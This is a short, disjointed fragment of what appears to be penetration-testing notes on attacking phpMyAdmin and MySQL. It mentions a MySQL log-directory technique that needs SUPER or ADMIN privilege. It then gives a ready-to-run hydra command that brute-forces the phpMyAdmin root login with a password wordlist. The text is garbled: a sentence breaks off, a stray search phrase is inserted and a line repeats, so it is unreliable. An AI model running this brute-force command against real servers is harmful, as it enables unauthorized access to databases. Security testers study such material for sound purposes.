Requires SUPER or ADMIN privilege. Works on MySQL 5.x/8.x if log dir is writable by mysql user.
Despite warnings, many test environments (and sadly some production) still use: phpmyadmin hacktricks verified
hydra -l root -P /usr/share/wordlists/fasttrack.txt target http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:token" Requires SUPER or ADMIN privilege